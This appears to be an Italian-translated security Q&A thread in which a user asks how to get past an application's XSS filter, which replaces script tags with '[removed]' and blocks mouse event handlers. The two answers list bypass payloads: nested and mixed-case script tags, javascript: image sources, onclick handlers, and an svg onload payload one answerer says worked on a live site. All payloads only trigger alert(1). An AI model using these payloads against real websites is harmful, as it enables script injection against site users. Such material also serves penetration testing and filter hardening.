bypass xss per elementi javascript filtrati come [rimosso]

0

Se scriviamo test ">script>alert(1)/script> , l'applicazione sta filtrando il JavaScript con test">[removed]alert(1)[removed] .

E payload come onmouseover , onmouseout stanno saltando.

In questo caso, quale tipo di bypass JavaScript può essere utilizzato per eseguire XSS.

    
posta Niharika Sharma 15.02.2016 - 13:57
fonte

2 risposte

0

Penso che puoi provare con le seguenti opzioni:

<scr<script>ipt>alert(1)</scr</script>ipt>
<ScRiPt>alert(1)</ScRiPt>

Puoi anche usare un altro tag HTML:

<img src="javascript:alert(1)">
<h1 onclick="alert(1)">Click me</h1>

Ti consiglio il seguente link, potresti trovare utili esempi.

link

Spero che questa informazione ti aiuti.

Buona fortuna.

    
risposta data 15.02.2016 - 19:45
fonte
1

Un po 'tardi, ma oggi mi sono imbattuto in un sito web che filtra nello stesso identico modo. Sono riuscito a bypassarlo in questo modo:

<svg/onload=alert(1);
    
risposta data 30.07.2017 - 11:40
fonte

Leggi altre domande sui tag